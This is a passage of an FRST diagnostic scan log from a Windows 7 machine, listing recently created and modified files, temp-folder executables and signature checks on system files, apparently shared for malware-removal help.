Files\Malwarebytes 2017-04-18 22:11 - 2017-03-22 11:02 - 00077440 _____ C:\Windows\system32\Drivers\mbae64.sys 2017-04-18 22:00 - 2017-04-19 09:28 - 00000000 ____D C:\FRST 2017-04-18 15:28 - 2017-04-18 15:28 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\ECSoftware 2017-04-18 15:28 - 2017-04-18 15:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Utilities 2017-04-18 15:28 - 2017-04-18 15:28 - 00000000 ____D C:\Program Files (x86)\HexEdit 2017-04-18 09:05 - 2017-04-18 09:12 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\Wise Euask 2017-04-18 09:04 - 2017-04-18 09:12 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\WiseUpdate 2017-04-15 21:58 - 2017-04-15 21:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox 2017-04-14 01:22 - 2017-04-14 01:22 - 00046408 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe 2017-04-13 14:29 - 2017-04-13 14:29 - 00000000 ___HD C:\$AV_ASW 2017-04-13 14:28 - 2017-04-13 14:29 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\SSMgre 2017-04-12 19:47 - 2017-04-12 19:47 - 00019668 _____ C:\Users\Tomash\AppData\Local\recently-used.xbel 2017-04-11 21:25 - 2017-04-11 21:25 - 00000000 ____D C:\Users\Public\Foxit Software 2017-04-11 21:24 - 2017-04-11 21:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Foxit Reader 2017-04-11 21:24 - 2017-04-11 21:24 - 00000000 ____D C:\ProgramData\Foxit Software 2017-04-11 21:24 - 2017-04-11 21:24 - 00000000 ____D C:\ProgramData\Foxit ContentPlatform 2017-04-11 21:23 - 2017-04-11 21:23 - 00000214 _____ C:\Users\Public\Documents\pre_fileassoc.tmp 2017-04-10 12:37 - 2017-04-11 12:37 - 00003580 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT 2017-04-08 23:17 - 2017-04-08 23:17 - 00002050 _____ C:\Users\Tomash\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\f.lux.lnk 2017-04-08 23:17 - 2017-04-08 23:17 - 00000000 ____D C:\Users\Tomash\AppData\Local\FluxSoftware 2017-04-08 23:16 - 2017-04-08 23:16 - 00496896 _____ C:\Users\Tomash\Downloads\flux-setup.exe 2017-04-07 23:05 - 2017-04-07 23:06 - 10247818 _____ C:\Users\Tomash\Downloads\The Crucible - Kerrigans evolve Cinematic [HD, 1280x720] (online-video-cutter.com).mp4 2017-04-06 21:43 - 2017-04-06 21:43 - 00045965 _____ C:\Users\Tomash\Nowy dokument 10.2017_04_06_21_43_22.0.svg 2017-04-04 17:13 - 2017-04-19 08:20 - 00004172 _____ C:\Windows\System32\Tasks\Avast Emergency Update 2017-04-04 17:13 - 2017-04-04 17:11 - 00334088 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys 2017-04-04 17:13 - 2017-04-04 17:11 - 00307736 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys 2017-04-04 17:13 - 2017-04-04 17:11 - 00189768 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys 2017-04-04 17:13 - 2017-04-04 17:11 - 00048528 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys 2017-04-04 17:12 - 2017-04-04 17:12 - 00399944 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe 2017-04-04 09:49 - 2017-04-04 10:04 - 00000254 _____ C:\Users\Tomash\.node_repl_history 2017-04-04 09:48 - 2017-04-04 09:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js 2017-04-04 09:48 - 2017-04-04 09:49 - 00000000 ____D C:\Program Files\nodejs 2017-04-04 09:48 - 2017-04-04 09:48 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\npm 2017-04-04 09:43 - 2017-04-04 09:46 - 12750848 _____ C:\Users\Tomash\Downloads\node-v6.10.1-x64.msi 2017-04-03 08:04 - 2017-04-03 08:04 - 00759406 _____ C:\Users\Tomash\Downloads\PŚP-15(1).xlsx 2017-04-02 10:20 - 2017-04-02 10:20 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_WinUsb_01009.Wdf 2017-04-02 10:16 - 2011-08-26 10:48 - 01002728 _____ (Microsoft Corporation) C:\Windows\system32\WinUSBCoInstaller2.dll 2017-04-02 10:10 - 2017-04-02 10:10 - 01100260 _____ C:\Users\Tomash\Downloads\Seeder-2.0.0.apk 2017-04-02 10:07 - 2017-04-02 10:07 - 00000000 ____D C:\Program Files (x86)\Handset WinDriver 2017-04-02 10:07 - 2011-10-24 06:04 - 00223232 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\hw_quusbmdm.sys 2017-04-02 10:07 - 2011-10-24 05:51 - 00116864 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\hw_usbdev.sys 2017-04-02 10:07 - 2010-02-19 01:00 - 01533512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WUDFUpdate_01007.dll 2017-04-02 10:07 - 2010-02-19 01:00 - 00708168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WinUSBCoInstaller.dll 2017-04-02 10:06 - 2017-04-02 10:20 - 00000195 _____ C:\Users\Tomash\AppData\Local\uts.ini 2017-04-02 10:06 - 2017-04-02 10:06 - 00000000 ____D C:\Users\Tomash\AppData\Local\uts 2017-04-02 10:05 - 2017-04-13 14:29 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\ScreenShot 2017-04-02 10:05 - 2017-04-04 17:13 - 00000000 ____D C:\Program Files (x86)\Kingo ROOT 2017-04-02 10:05 - 2017-04-02 10:05 - 00001859 _____ C:\ProgramData\Microsoft\Windows\Start Menu\ScreenShot.lnk 2017-04-02 10:05 - 2017-04-02 10:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot 2017-04-02 10:05 - 2017-04-02 10:05 - 00000000 ____D C:\Program Files (x86)\ScreenShot 2017-04-02 10:03 - 2017-04-02 10:03 - 01292784 _____ (Pip ) C:\Users\Tomash\Downloads\KingoRoot.exe 2017-03-31 08:10 - 2017-03-31 08:10 - 00459565 _____ C:\Users\Tomash\Downloads\Folder(2017-3-3)0002.PDF 2017-03-30 20:09 - 2017-04-04 17:12 - 00000000 ____D C:\Users\Tomash\.VirtualBox 2017-03-30 20:09 - 2017-03-30 20:09 - 00000000 ____D C:\Users\Tomash\.docker 2017-03-30 20:02 - 2017-03-30 20:03 - 00000000 ____D C:\ProgramData\Git 2017-03-30 20:02 - 2017-03-30 20:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Git 2017-03-30 20:01 - 2017-03-30 20:03 - 00000000 ____D C:\Program Files\Git 2017-03-30 20:01 - 2017-03-30 20:01 - 00000000 ____D C:\Users\Tomash\AppData\.docker 2017-03-30 20:00 - 2017-03-30 20:00 - 00000042 _____ C:\windows-version.txt 2017-03-30 20:00 - 2017-03-30 20:00 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\DockerToolbox 2017-03-29 11:22 - 2017-03-29 11:22 - 00757508 _____ C:\Users\Tomash\Downloads\PŚP-15.xlsx 2017-03-28 16:58 - 2017-04-02 10:06 - 00000000 ____D C:\Users\Tomash\.android 2017-03-28 09:40 - 2017-03-28 09:40 - 00067177 _____ C:\Users\Tomash\Downloads\Sprawozdanie_P_03.17.pdf 2017-03-24 12:55 - 2017-03-24 12:55 - 00036906 _____ C:\Users\Tomash\Downloads\Zeskanowano za pomocą urządzenia wielofunkcyjnego Xerox.pdf 2017-03-24 09:21 - 2017-03-24 09:21 - 00001077 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinSCP.lnk 2017-03-24 09:21 - 2017-03-24 09:21 - 00000000 ____D C:\Program Files (x86)\WinSCP 2017-03-23 09:26 - 2017-03-23 09:26 - 00000708 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brackets.lnk 2017-03-22 13:06 - 2017-03-23 09:50 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\Brackets 2017-03-22 13:04 - 2017-03-23 09:26 - 00000000 ____D C:\Program Files (x86)\Brackets 2017-03-22 05:57 - 2017-03-22 05:57 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys 2017-03-22 05:57 - 2017-03-22 05:57 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys 2017-03-22 05:57 - 2017-03-22 05:57 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys 2017-03-20 16:35 - 2017-03-20 16:36 - 00173042 _____ C:\Users\Tomash\Downloads\ticket_kra_czer_24_25_03.pdf ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-04-19 09:28 - 2016-11-16 17:42 - 00000000 ____D C:\Users\Tomash\AppData\LocalLow\Mozilla 2017-04-19 08:43 - 2016-08-23 09:19 - 00000000 ___RD C:\Users\Tomash\Dropbox 2017-04-19 08:41 - 2017-01-03 11:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Thunderbird 2017-04-19 08:41 - 2016-08-23 09:11 - 00001152 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job 2017-04-19 08:41 - 2016-08-22 18:27 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2017-04-19 08:39 - 2016-08-23 09:10 - 00001148 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job 2017-04-19 08:38 - 2016-08-23 08:34 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\Dexpot 2017-04-19 08:17 - 2009-07-14 06:45 - 00021840 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2017-04-19 08:17 - 2009-07-14 06:45 - 00021840 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2017-04-19 08:10 - 2017-01-25 19:09 - 00000437 _____ C:\Windows\system32\Drivers\etc\hosts.ics 2017-04-19 08:09 - 2016-08-22 18:56 - 00000000 ____D C:\ProgramData\NVIDIA 2017-04-19 08:09 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2017-04-18 22:24 - 2016-08-26 08:57 - 00001743 _____ C:\Windows\system32\ServiceFilter.ini 2017-04-18 22:24 - 2016-08-26 08:57 - 00001707 _____ C:\Windows\system32\AutoRunFilter.ini 2017-04-18 20:59 - 2016-08-22 18:24 - 00000000 ___SD C:\Users\Tomash\AppData\LocalLow\Temp 2017-04-18 09:12 - 2016-08-23 09:02 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\Wise Registry Cleaner 2017-04-15 21:59 - 2016-08-23 09:10 - 00000000 ____D C:\Program Files (x86)\Dropbox 2017-04-13 18:18 - 2009-07-14 07:13 - 00781302 _____ C:\Windows\system32\PerfStringBackup.INI 2017-04-13 18:18 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf 2017-04-12 22:12 - 2016-08-26 13:19 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\foobar2000 2017-04-12 19:34 - 2016-08-22 19:09 - 00000000 ____D C:\Users\Tomash\AppData\Local\Spotify 2017-04-12 19:13 - 2016-08-22 19:07 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\Spotify 2017-04-12 13:35 - 2016-08-22 18:15 - 00000000 ____D C:\Users\Tomash\AppData\Roaming\Foxit Software 2017-04-12 08:44 - 2016-08-30 20:33 - 00000000 ____D C:\Users\Tomash\.qgis2 2017-04-12 08:44 - 2016-08-23 10:04 - 00000000 ____D C:\Users\Tomash\.matplotlib 2017-04-11 21:14 - 2016-08-22 19:07 - 00001213 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk 2017-04-11 21:12 - 2016-08-22 21:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip 2017-04-11 21:12 - 2016-08-22 21:03 - 00000000 ____D C:\Program Files\7-Zip 2017-04-11 20:48 - 2017-02-10 12:56 - 00003480 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2017-04-11 20:48 - 2017-02-10 12:56 - 00003352 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2017-04-11 15:24 - 2017-02-23 20:26 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task 2017-04-11 15:23 - 2017-02-23 20:26 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk 2017-04-06 21:43 - 2016-08-22 18:08 - 00000000 ____D C:\Users\Tomash 2017-04-06 09:23 - 2016-08-22 18:14 - 00000000 ____D C:\ProgramData\AVAST Software 2017-04-05 08:46 - 2016-09-01 08:31 - 00000000 ____D C:\Temp 2017-04-05 08:45 - 2016-08-22 18:22 - 00003894 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1471882921 2017-04-05 08:43 - 2009-07-14 07:32 - 00000000 ____D C:\Program Files\Windows Sidebar 2017-04-04 17:12 - 2016-08-22 18:19 - 00556784 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys 2017-04-04 17:12 - 2016-08-22 18:19 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys 2017-04-04 17:12 - 2016-08-22 18:19 - 00164064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys 2017-04-04 17:12 - 2016-08-22 18:19 - 00127112 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys 2017-04-04 17:12 - 2016-08-22 18:19 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys 2017-04-04 17:12 - 2016-08-22 18:19 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys 2017-04-04 17:12 - 2016-08-22 18:19 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys 2017-04-04 17:11 - 2016-08-22 18:21 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys 2017-04-04 17:11 - 2016-08-22 18:19 - 01005048 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys 2017-04-04 08:20 - 2017-02-10 12:58 - 00002201 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2017-03-31 09:24 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF 2017-03-29 17:08 - 2016-11-16 10:39 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2017-03-28 12:29 - 2017-01-24 20:08 - 00000600 _____ C:\Users\Tomash\AppData\Roaming\winscp.rnd 2017-03-24 15:51 - 2017-01-30 15:06 - 00004608 _____ C:\Users\Tomash\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2017-03-23 18:10 - 2016-08-23 22:19 - 00000000 ____D C:\Program Files\ImageMagick-6.9.0-Q16 2017-03-23 18:10 - 2016-08-22 18:19 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software 2017-03-23 18:10 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\registration 2017-03-23 18:10 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\AppCompat 2017-03-23 09:40 - 2016-08-22 19:13 - 00000000 ____D C:\Users\UpdatusUser ==================== Files in the root of some directories ======= 2017-01-24 20:08 - 2017-03-28 12:29 - 0000600 _____ () C:\Users\Tomash\AppData\Roaming\winscp.rnd 2017-01-30 15:06 - 2017-03-24 15:51 - 0004608 _____ () C:\Users\Tomash\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2017-04-12 19:47 - 2017-04-12 19:47 - 0019668 _____ () C:\Users\Tomash\AppData\Local\recently-used.xbel 2017-04-02 10:06 - 2017-04-02 10:20 - 0000195 _____ () C:\Users\Tomash\AppData\Local\uts.ini 2016-11-07 01:20 - 2016-11-07 01:20 - 0000000 _____ () C:\Users\Tomash\AppData\Local\{F83F7FF7-2D1E-4608-8CA2-4BDCC66B6787} 2016-10-06 14:31 - 2016-10-06 14:31 - 0000041 ___SH () C:\ProgramData\.zreglib Some files in TEMP: ==================== 2017-02-14 11:04 - 2013-01-18 23:24 - 0040328 _____ (Autodesk, Inc.) C:\Users\Tomash\AppData\Local\Temp\AcDeltree.exe 2016-09-06 11:52 - 2013-07-25 10:15 - 0026688 _____ (Foxit Corporation) C:\Users\Tomash\AppData\Local\Temp\Checkupdate.exe 2016-09-18 21:34 - 2016-09-18 21:34 - 2611043 _____ (Zeyfman Genady, iTVa Inc. ) C:\Users\Tomash\AppData\Local\Temp\DicterSetup.exe 2016-09-18 21:35 - 2016-09-29 17:47 - 0008224 _____ () C:\Users\Tomash\AppData\Local\Temp\DicterUpdater.exe 2016-09-06 11:51 - 2014-01-06 16:20 - 9580608 _____ (Foxit Corporation) C:\Users\Tomash\AppData\Local\Temp\Foxit Reader Updater.exe 2016-10-10 09:35 - 2014-01-06 16:20 - 9580608 _____ (Foxit Corporation) C:\Users\Tomash\AppData\Local\Temp\Foxit Updater.exe 2017-04-11 21:23 - 2015-09-28 10:45 - 4990656 _____ (Foxit Corporation) C:\Users\Tomash\AppData\Local\Temp\FoxitUpdater.exe 2016-09-06 11:52 - 2013-08-16 13:56 - 0216064 _____ () C:\Users\Tomash\AppData\Local\Temp\gcapi_dll.dll 2016-09-06 11:52 - 2013-08-16 13:56 - 0073408 _____ () C:\Users\Tomash\AppData\Local\Temp\gtapi_signed.dll 2016-09-02 14:13 - 2016-09-02 14:14 - 37232728 _____ (PandoraTV) C:\Users\Tomash\AppData\Local\Temp\KMP_4.1.2.2.exe 2016-10-08 20:50 - 2016-10-19 13:03 - 37642072 _____ (PandoraTV) C:\Users\Tomash\AppData\Local\Temp\KMP_4.1.3.3.exe 2016-11-11 20:34 - 2016-12-02 23:19 - 37794928 _____ (PandoraTV) C:\Users\Tomash\AppData\Local\Temp\KMP_4.1.4.7.exe 2017-02-16 10:34 - 2017-02-16 10:34 - 2858376 _____ () C:\Users\Tomash\AppData\Local\Temp\npp.7.2.2.Installer.exe 2016-11-12 23:28 - 2015-07-10 00:46 - 0032768 _____ () C:\Users\Tomash\AppData\Local\Temp\shutdown1478986135.exe 2017-01-12 16:34 - 2017-01-12 16:34 - 0000000 _____ () C:\Users\Tomash\AppData\Local\Temp\{17212C98-9918-41B1-81CF-FFDF558A78F7}-DropboxClient_17.4.33.exe 2016-09-02 08:19 - 2016-09-02 08:19 - 0000000 _____ () C:\Users\Tomash\AppData\Local\Temp\{419FE598-0343-43FC-8D5A-DE115F22D8CD}-DropboxClient_9.4.49.exe ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2017-04-13 13:00 ==================== End of FRST.txt ============================